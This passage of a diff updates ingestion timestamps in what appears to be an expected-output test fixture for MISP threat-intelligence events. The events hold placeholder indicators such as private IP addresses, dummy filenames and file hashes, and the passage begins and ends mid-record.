No Worries, GoScanSSH Didn’t\",\"org_id\":\"1\",\"orgc_id\":\"2\",\"published\":true,\"threat_level_id\":\"3\",\"timestamp\":\"1523865236\",\"uuid\":\"5acdb4d0-b534-4713-9612-4a1d950d210f\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"4\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3632\",\"info\":\"Test event 2 just more atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"2\",\"timestamp\":\"1621588836\",\"uuid\":\"efbca287-edb5-4ad7-b8e4-fe9da514a763\"}}", "category": "threat", "type": "indicator", 
@@ -282,7 +282,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827794127Z", + "ingested": "2021-12-09T13:49:02.948935Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Network activity\",\"comment\":\"Ip-src attribute context for event2\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3632\",\"first_seen\":null,\"id\":\"266261\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588800\",\"to_ids\":false,\"type\":\"ip-src\",\"uuid\":\"3dbf224b-7c84-4c4b-9f95-80f28954bd10\",\"value\":\"10.0.0.1\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"2\",\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"analysis\":\"2\",\"date\":\"2018-03-26\",\"distribution\":\"3\",\"id\":\"684\",\"info\":\"OSINT - Forgot About Default Accounts? 
No Worries, GoScanSSH Didn’t\",\"org_id\":\"1\",\"orgc_id\":\"2\",\"published\":true,\"threat_level_id\":\"3\",\"timestamp\":\"1523865236\",\"uuid\":\"5acdb4d0-b534-4713-9612-4a1d950d210f\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"4\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3632\",\"info\":\"Test event 2 just more atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"2\",\"timestamp\":\"1621588836\",\"uuid\":\"efbca287-edb5-4ad7-b8e4-fe9da514a763\"}}", "category": "threat", "type": "indicator", 
@@ -354,7 +354,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827800189Z", + "ingested": "2021-12-09T13:49:02.948939300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Network activity\",\"comment\":\"ip-dst context for event id 2\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3632\",\"first_seen\":null,\"id\":\"266262\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621588836\",\"to_ids\":true,\"type\":\"ip-dst\",\"uuid\":\"db4bfd36-7374-4f8c-9031-60e56d4bba30\",\"value\":\"192.168.1.50\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"2\",\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"analysis\":\"2\",\"date\":\"2018-03-26\",\"distribution\":\"3\",\"id\":\"684\",\"info\":\"OSINT - Forgot About Default Accounts? 
No Worries, GoScanSSH Didn’t\",\"org_id\":\"1\",\"orgc_id\":\"2\",\"published\":true,\"threat_level_id\":\"3\",\"timestamp\":\"1523865236\",\"uuid\":\"5acdb4d0-b534-4713-9612-4a1d950d210f\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"4\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3632\",\"info\":\"Test event 2 just more atrributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"2\",\"timestamp\":\"1621588836\",\"uuid\":\"efbca287-edb5-4ad7-b8e4-fe9da514a763\"}}", "category": "threat", "type": "indicator", 
@@ -445,7 +445,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827807572Z", + "ingested": "2021-12-09T13:49:02.948944Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266267\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"fullpath\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"ff97cc32-815e-4fc9-9d4b-cab9822027a6\",\"value\":\"\\\\the\\\\fullpath\\\\to the file\\\\filenameofobject.txt\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with 
meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", 
@@ -536,7 +536,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827814265Z", + "ingested": "2021-12-09T13:49:02.948949700Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266268\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"size-in-bytes\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":false,\"type\":\"size-in-bytes\",\"uuid\":\"e378b4d9-43e1-4c64-bd4e-70fce2b4e581\",\"value\":\"505050\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with 
meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", 
@@ -631,7 +631,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827820827Z", + "ingested": "2021-12-09T13:49:02.948954300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266264\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"md5\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"787b3822-0bec-4278-b34a-5d649e7bce05\",\"value\":\"70461da8b94c6ca5d2fda3260c5a8c3b\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with 
meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", 
@@ -726,7 +726,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827827380Z", + "ingested": "2021-12-09T13:49:02.948958900Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266265\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"sha256\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":true,\"type\":\"sha256\",\"uuid\":\"657c5f2b-9d68-4ff7-a9ad-ab9e6a6c953e\",\"value\":\"f33c27745f2bd87344be790465ef984a972fd539dc83bd4f61d4242c607ef1ee\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with 
meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", 
@@ -819,7 +819,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827833501Z", + "ingested": "2021-12-09T13:49:02.948964600Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"filename contect for test event 3\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266263\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1621589229\",\"to_ids\":false,\"type\":\"filename\",\"uuid\":\"3b322e1a-1dd8-490c-ab96-12e1bc3ee6a3\",\"value\":\"thetestfile.txt\"},\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"266266\",\"last_seen\":null,\"object_id\":\"18207\",\"object_relation\":\"filename\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621589548\",\"to_ids\":true,\"type\":\"filename\",\"uuid\":\"6648d129-9200-431b-9b41-263a84f7c9d2\",\"value\":\"filenameofobject.txt\"},\"ObjectReference\":[],\"comment\":\"File object for event 3\",\"deleted\":false,\"description\":\"File object describing a file with 
meta-information\",\"distribution\":\"5\",\"event_id\":\"3633\",\"first_seen\":null,\"id\":\"18207\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621589548\",\"uuid\":\"42a88ad4-6834-46a9-a18b-aff9e078a4ea\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"analysis\":\"0\",\"date\":\"2021-05-21\",\"distribution\":\"1\",\"id\":\"3631\",\"info\":\"Test event 1 just atrributes\",\"org_id\":\"1\",\"orgc_id\":\"1\",\"published\":false,\"threat_level_id\":\"1\",\"timestamp\":\"1621588162\",\"uuid\":\"8ca56ae9-3747-4172-93d2-808da1a4eaf3\"}}],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"6\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3633\",\"info\":\"Test event 3 objects and attributes\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"1\",\"timestamp\":\"1621592532\",\"uuid\":\"4edb20c7-8175-484d-bdcd-fce6872c1ef3\"}}", "category": "threat", "type": "indicator", 
@@ -892,7 +892,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827856424Z", + "ingested": "2021-12-09T13:49:02.948969200Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Other\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"266269\",\"last_seen\":null,\"object_id\":\"18208\",\"object_relation\":\"text\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621591770\",\"to_ids\":false,\"type\":\"text\",\"uuid\":\"25d2f181-26ae-4d6f-b4fd-85b9d1f82e67\",\"value\":\"Free text in the file object\"},\"ObjectReference\":[],\"comment\":\"File object for test event 4 \",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"18208\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621591770\",\"uuid\":\"190c762c-a389-4ecc-8f6e-68f92d42adef\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"3\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3634\",\"info\":\"Test event 4 with object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1621591770\",\"uuid\":\"d98a8418-9f90-4b50-a623-6921ca5b356d\"}}", "category": "threat", "type": 
"indicator", 
@@ -969,7 +969,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827866483Z", + "ingested": "2021-12-09T13:49:02.948974200Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"266270\",\"last_seen\":null,\"object_id\":\"18208\",\"object_relation\":\"sha256\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621591770\",\"to_ids\":true,\"type\":\"sha256\",\"uuid\":\"4e579782-346b-44b3-b72c-1cae8d87cb25\",\"value\":\"567caa7653723f8818ec9eb6f2e27f6d9d8c0aca0c96fc457659340e7bbdc666\"},\"ObjectReference\":[],\"comment\":\"File object for test event 4 \",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"18208\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621591770\",\"uuid\":\"190c762c-a389-4ecc-8f6e-68f92d42adef\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"3\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3634\",\"info\":\"Test event 4 with 
object\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"1\",\"proposal_email_lock\":false,\"publish_timestamp\":\"0\",\"published\":false,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1621591770\",\"uuid\":\"d98a8418-9f90-4b50-a623-6921ca5b356d\"}}", "category": "threat", "type": "indicator", 
@@ -1044,7 +1044,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:39.827873576Z", + "ingested": "2021-12-09T13:49:02.948980Z", "original": "{\"Event\":{\"Attribute\":[],\"EventReport\":[],\"Galaxy\":[],\"Object\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"\",\"deleted\":false,\"disable_correlation\":true,\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"266271\",\"last_seen\":null,\"object_id\":\"18208\",\"object_relation\":\"filename\",\"sharing_group_id\":\"0\",\"timestamp\":\"1621591770\",\"to_ids\":true,\"type\":\"filename\",\"uuid\":\"a40343b5-a480-4288-9b0c-7ae074a77140\",\"value\":\"filenameinmispobject.txt\"},\"ObjectReference\":[],\"comment\":\"File object for test event 4 \",\"deleted\":false,\"description\":\"File object describing a file with meta-information\",\"distribution\":\"5\",\"event_id\":\"3634\",\"first_seen\":null,\"id\":\"18208\",\"last_seen\":null,\"meta-category\":\"file\",\"name\":\"file\",\"sharing_group_id\":\"0\",\"template_uuid\":\"688c46fb-5edb-40a3-8273-1af7923e2215\",\"template_version\":\"22\",\"timestamp\":\"1621591770\",\"uuid\":\"190c762c-a389-4ecc-8f6e-68f92d42adef\"},\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"Orgc\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"78acad2d-cc2d-4785-94d6-b428a0070488\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"analysis\":\"0\",\"attribute_count\":\"3\",\"date\":\"2021-05-21\",\"disable_correlation\":false,\"distribution\":\"1\",\"event_creator_email\":\"admin@admin.test\",\"extends_uuid\":\"\",\"id\":\"3634\",\"info\":\"Test event 4 with 